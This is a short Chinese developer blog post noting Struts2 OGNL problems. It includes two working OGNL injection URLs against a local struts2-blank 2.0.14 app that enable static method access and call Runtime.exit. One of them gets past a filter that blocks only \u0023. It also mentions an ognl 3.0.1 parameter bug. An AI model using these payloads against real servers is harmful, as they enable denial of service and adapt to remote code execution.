struts2-ognl mark - 玮哥也是哥 - ITeye博客

`

sw1982

浏览: 511224 次
性别:
来自: 深圳

最近访客更多访客>>

chenliqiang

leileishizhutou

yangky281

polo2008

博主相关

博客

微博

相册

收藏

留言

关于我

文章分类

社区版块

存档分类

最新评论

di1984HIT：学习了~~
jackson JSON对象映射出多余字段的bug
lvye351：当然，在tomcat还有JPDA这种方式，来远程debug： ...
配置linux下tomcat的远程debug
hety163：好，语言简单明了易懂
Http和Socket连接区别
高军威： <b>行不行</b>
XSS转码 && struts2 property标签的bug
chjy1983：请教下，我这样：JSONObject jsonObject = ...
HttpClient4 POST数据及问题

struts2-ognl mark

博客分类：

技术点滴

阅读更多

暂时mark在这，后面再补充

1. 关于漏洞的问题

http://localhost:8080/struts2-blank-2.0.14/example/HelloWorld.action

2.0.9不行

http://localhost:8080/struts2-blank-2.0.14/example/HelloWorld.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

2.0.14失效

仅过滤\u0023不行

http://localhost:8080/struts2-blank-2.0.14/example/HelloWorld.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('zz')(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(x))(zzxx))&('aaa')((('\43context.excludeProperties\u003dEMPTY_SET')('x'))(zzxx))&(asdf)(('@java.lang.Runtime@getRuntime().exit(1)')('z'))

2.ognl3.0.1的问题

升级到struts2.2.3之后，ognl3.0.1会产生一个小bug。基本类型的参数，比如int,long,short，如果在请求参数中没有赋值，会抛出NosuchMethod的异常。

分享到：

决策性头脑风暴 | 土匪头头

2011-12-29 16:49
浏览 1578
评论(0)
分类:编程语言
查看更多

评论

发表评论

您还没有登录,请您登录后再发表评论

相关推荐

struts2-xwork-ognl的源文件（jar包）: `ognl-3.0.6-sources.jar` 包含了OGNL的源代码，这是一门强大的表达式语言，用于在Struts2中访问和操作对象图。OGNL可以用来在视图层动态地获取或设置模型对象的属性，也可以在控制器层执行复杂的表达式来控制流程。...

struts2-OGNL表达式测试: 这个“struts2-OGNL表达式测试”可能是一个测试项目或代码示例，旨在演示如何在Struts2应用中使用OGNL表达式。 OGNL是Struts2的核心组件之一，它允许开发者通过简单的字符串表达式来获取或设置对象的属性。这使得视...

struts2-scan_struts2-scan_struts2scan_scan_struts2漏洞_: Struts2漏洞通常涉及到框架的核心组件，例如OGNL（Object-Graph Navigation Language）表达式，这是一种强大的语言，允许在运行时动态地操作对象属性。2017年，一个名为CVE-2017-9805的重大漏洞被发现，它允许远程...

Struts2-OGNL.rar_ognl: 在Struts2中，OGNL（Object-Graph Navigation Language）扮演着核心角色，它是一种强大的表达式语言，用于在Action类和JSP页面之间交换数据。下面我们将深入探讨OGNL的基本概念、特性以及在Struts2中的应用。 1. ...

struts2-showcase.rar: 4. **OGNL（Object-Graph Navigation Language）**：Struts2的默认表达式语言，用于数据绑定，可以在Action和JSP之间方便地传递数据。 5. **插件体系**：Struts2支持丰富的插件，如Tiles、Freemarker、i18n等，方便...

struts2-xwork-ognl的javadoc文件（jar包）: `ognl-3.0.6-javadoc.jar` 是OGNL的API文档。OGNL是Struts2中用于表达式语言的主要工具，它允许开发者动态地访问和修改对象的属性，以及执行复杂的表达式。通过Javadoc，开发者可以学习到如何使用OGNL表达式来绑定...

mina-integration-ognl-2.0.0-M4.jar: mina-integration-ognl-2.0.0-M4.jar mina-integration-ognl-2.0.0-M4.jar

struts2-core-2.0.12.jar: OGNL是Struts2中的表达式语言，用于在视图和模型之间传递数据。它允许开发者直接访问对象属性，支持动态方法调用，使得视图层的绑定变得简单而强大。 **6. freemarker和JSP视图技术** Struts2支持多种视图技术，...

struts-2.5.2-all所有jar包: ognl-3.1.10.jar, org.apache.felix.framework-4.0.3.jar, org.apache.felix.main-4.0.3.jar, org.apache.felix.shell-1.4.3.jar, org.apache.felix.shell.tui-1.4.1.jar, org.osgi.compendium-4.0.0.jar, org.osgi....

struts2-016/017漏洞解决: Struts2 S2-016漏洞，全称为“Struts2 OGNL注入漏洞”，主要出现在Struts2的2.3.5到2.3.31以及2.5.0到2.5.10.1版本之间。这个漏洞允许攻击者通过恶意构造的OGNL（Object-Graph Navigation Language）表达式来执行...

struts2-2.3.32 相关jar包: OGNL是Struts2中用于动态表达和数据绑定的语言，当未正确配置或更新时，可能会成为攻击的入口点。 Struts2的2.3.32版本发布主要是为了修复此类安全漏洞，以提高系统的安全性。开发者应该及时更新到这个或更高版本，...

Struts2-2.5.13最新jar下载: 7. **OGNL（Object-Graph Navigation Language）**：OGNL是Struts2的默认表达式语言，用于在模型和视图之间传递数据。 8. **FilterDispatcher**：作为Struts2的前端控制器，FilterDispatcher负责接收HTTP请求，解析...

struts2-2.0 jar包: struts2-2.0用到的核心jar包，包括commons-logging-1.0.4.jar，freemarker-2.3.8.jar，ognl-2.6.11.jar，struts2-core-2.0.14.jar，struts2-dojo-plugin-2.1.8.1.jar，xwork-2.0.7.jar

struts-2.5所有jar包: Struts2是一个基于MVC（Model-View-Controller）设计模式的开源Java Web框架，它在Web应用开发中被广泛使用。Struts2的核心是Action类，它负责处理用户请求，与模型进行交互，并将结果返回给视图。在Struts2的版本...

struts2-tags-API,struts2标签api: OGNL（Object-Graph Navigation Language）是Struts2中用于数据绑定的语言，它允许在标签中直接访问Action对象的属性。例如，`<s:property value="#session.user.name" />`就能显示会话中用户对象的姓名属性。五、...

struts2-2.3.4.1-all: 3. **OGNL（Object-Graph Navigation Language）**：Struts2使用OGNL作为表达式语言，用于在视图层和模型层之间传递数据，使得数据绑定更为简单。 4. **Tiles**：Struts2集成了Tiles框架，允许开发者创建可重用的...

struts2对Ognl的封装--PropertyAccessor: "struts2对Ognl的封装--PropertyAccessor"这个主题主要涉及Struts2框架如何处理OGNL表达式，特别是如何通过PropertyAccessor接口来访问和操作对象的属性。首先，我们来了解什么是OGNL。OGNL是Struts2的核心组件之...

Struts2-2.3.16 全jar包: ognl-3.0.jar struts2-core-2.2.1.1.jar xwork-core-2.2.1.1.jar 共8个包，将其复制到/Struts2/WebRoot/WEB-INF/lib下面方法二：（不用复制，导入法）（1）.右击项目名称Struts2-->Build Path-->Configure ...

Struts2最新漏洞升级2.3.32版本: ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar 2、删除上面原有的低版本jar 3、修改 WEB-INF\classes 目录下...

Struts2深入学习----OGNL表达式原理: 其中，OGNL（Object-Graph Navigation Language）是Struts2中的核心表达式语言，用于数据绑定和表示层的数据操作。这篇深入学习的文章主要探讨了OGNL表达式的原理和使用。首先，我们来理解一下OGNL是什么。OGNL是...

Global site tag (gtag.js) - Google Analytics